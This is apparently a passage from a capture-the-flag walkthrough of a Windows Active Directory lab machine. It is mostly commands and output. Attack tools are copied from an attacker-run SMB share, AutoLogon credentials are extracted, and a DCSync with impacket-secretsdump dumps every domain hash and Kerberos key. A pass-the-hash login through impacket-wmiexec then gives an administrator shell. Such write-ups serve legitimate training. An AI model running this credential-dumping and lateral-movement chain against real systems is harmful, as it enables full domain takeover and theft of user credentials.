BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Looking for other users in this domain,

*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user /domain

User accounts for \\

-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr
The command completed with one or more errors.

HSmith and svc_loanmgr might be potential targets

Running my SMB share on my local machine to transfer scripts for post exploitation,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-smbserver MONISH SMBShare/ -smb2support           
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Lets try to run PowerUp.ps1 for privilege escalation,

*Evil-WinRM* PS C:\Users\FSmith> copy \\10.10.14.4\MONISH\PowerUp.ps1 .
*Evil-WinRM* PS C:\Users\FSmith> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\FSmith>
*Evil-WinRM* PS C:\Users\FSmith> . ./PowerUp.ps1
*Evil-WinRM* PS C:\Users\FSmith> Invoke-AllChecks

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...


[*] Checking for unquoted service paths...
Access denied 
At C:\Users\FSmith\PowerUp.ps1:1451 char:21
+     $VulnServices = Get-WmiObject -Class win32_service | Where-Object ...
+                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand


[*] Checking service executable and argument permissions...
Access denied 
At C:\Users\FSmith\PowerUp.ps1:1504 char:5
+     Get-WMIObject -Class win32_service | Where-Object {$_ -and $_.pat ...
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand


[*] Checking service permissions...
Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
At C:\Users\FSmith\PowerUp.ps1:1555 char:5
+     Get-Service | Test-ServiceDaclPermission -PermissionSet 'ChangeCo ...
+     ~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Get-Service], InvalidOperationException
    + FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetServiceCommand


[*] Checking %PATH% for potentially hijackable DLL locations...


ModifiablePath    : C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps
IdentityReference : EGOTISTICALBANK\FSmith
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'





[*] Checking for AlwaysInstallElevated registry key...


[*] Checking for Autologon credentials in registry...


[*] Checking for modifidable registry autoruns and configs...


[*] Checking for modifiable schtask files/configs...


[*] Checking for unattended install files...


[*] Checking for encrypted web.config strings...


[*] Checking for encrypted application pool and virtual directory passwords...


[*] Checking for plaintext passwords in McAfee SiteList.xml files....



[*] Checking for cached Group Policy Preferences .xml files....

*Evil-WinRM* PS C:\Users\FSmith> 

No potential vectors for privilege escalation using PowerUp.ps1

We can also try winPEAS and watson for any sensitive info or CVEs

*Evil-WinRM* PS C:\Users\FSmith> copy 20220328072842_BloodHound.zip \\10.10.14.4\MONISH\
*Evil-WinRM* PS C:\Users\FSmith> copy \\10.10.14.4\MONISH\winPEASany.exe .
*Evil-WinRM* PS C:\Users\FSmith> .\winPEASany.exe log=scan.txt
"log" argument present, redirecting output to file "scan.txt"
*Evil-WinRM* PS C:\Users\FSmith> copy scan.txt \\10.10.14.4\MONISH\

Lets analyse the scan result,

┌──(kaliaidenpearce369)-[~/SMBShare]
└─$ cat scan.txt

...

╔══════════╣ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

...

Lateral Movement - svc_loanmgr

From the credentials above we can see that the DefaultUserName is EGOTISTICALBANK\svc_loanmanager, but we need SAM Account Name

From the net user command we can see that the SAM Account Name is svc_loanmgr

Now we have the autologon credentials for EGOTISTICALBANK\svc_loanmanager, lets use this to gain shell using evil-winrm

┌──(kaliaidenpearce369)-[~]
└─$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
                                                                                                                                                             
┌──(kaliaidenpearce369)-[~]
└─$ evil-winrm -u svc_loanmgr -p 'Moneymakestheworldgoround!' -i 10.10.10.175

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> hostname
SAUNA

The privileges and group membership of this user is same as the previous one,

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Even though if we run PowerUp.ps1/winPEAS etc.. on the same machine its going to give us almost the same output

We need an alternate approach, so lets use SharpHound

Running SharpHound

Lets try to run SharpHound Ingestors to view the output in BloodHound,

*Evil-WinRM* PS C:\Users\svc_loanmgr> copy \\10.10.14.4\MONISH\SharpHound.exe .
*Evil-WinRM* PS C:\Users\svc_loanmgr> .\SharpHound.exe --collectionmethods all
2022-03-28T07:54:10.8543028-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-03-28T07:54:10.8543028-07:00|INFORMATION|Initializing SharpHound at 7:54 AM on 3/28/2022
2022-03-28T07:54:35.0574370-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-03-28T07:54:35.2136896-07:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL
2022-03-28T07:54:35.2449526-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-03-28T07:54:35.2449526-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-03-28T07:55:05.6511961-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2022-03-28T07:55:34.0261756-07:00|INFORMATION|Consumers finished, closing output channel
2022-03-28T07:55:34.0574273-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-03-28T07:55:34.2918182-07:00|INFORMATION|Status: 94 objects finished (+94 1.59322)/s -- Using 57 MB RAM
2022-03-28T07:55:34.2918182-07:00|INFORMATION|Enumeration finished in 00:00:59.0988141
2022-03-28T07:55:34.4169036-07:00|INFORMATION|SharpHound Enumeration Completed at 7:55 AM on 3/28/2022! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc_loanmgr> ls


    Directory: C:\Users\svc_loanmgr


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/15/2018  12:19 AM                Desktop
d-r---        1/25/2020   1:04 PM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos
-a----        3/28/2022   7:55 AM          11205 20220328075533_BloodHound.zip
-a----        3/27/2022   3:51 AM         906752 SharpHound.exe
-a----        3/28/2022   7:55 AM           8720 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin


*Evil-WinRM* PS C:\Users\svc_loanmgr> copy 20220328075533_BloodHound.zip \\10.10.14.4\MONISH\

Seems like my SharpHound didn’t collect user data here, tried many time but same result

Getting the SID (Security Identifier) of the current user,

*Evil-WinRM* PS C:\Users\svc_loanmgr> whoami /user

USER INFORMATION
----------------

User Name                   SID
=========================== ==============================================
egotisticalbank\svc_loanmgr S-1-5-21-2966785786-3096785034-1186376766-1108

Lets load the zip in BloodHound to analyse the AD domain,

Looks like we have 2 ACLs on the domain itself

Using this we can perform DCSync Attack from this user to dump all hashes

DCSync Attack

Since we have privileges to perform DCSync Attack as this user, lets dump all hashes

┌──(kaliaidenpearce369)-[~]
└─$ impacket-secretsdump svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:25ec45dec42602d1e60fb0efa6de3807:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:47b1e9c0ea3f044a46d4503cd259fecf091d221b96c0d85127b0a27c74cfdf6f
SAUNA$:aes128-cts-hmac-sha1-96:ad5380ae69f55279f536d4e7a1439528
SAUNA$:des-cbc-md5:e6945843a4a43458
[*] Cleaning up...

Now we have all the hashes in the domain and it is a full domain takeover

Lateral Movement - Administrator

Since we have the NTLM hash of the Administrator account, we can simply perform Pass The Hash attack to gain access,

Using impacket-wmiexec for PTH attack,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-wmiexec EGOTISTICALBANK/Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
egotisticalbank\administrator

C:\>hostname
SAUNA

C:\>cd Users\Administrator\Desktop
C:\Users\Administrator\Desktop>more root.txt
<ROOT FLAG>

C:\Users\Administrator\Desktop>

We can also use impacket-psexec/impacket-smbexec etc... depends on our choice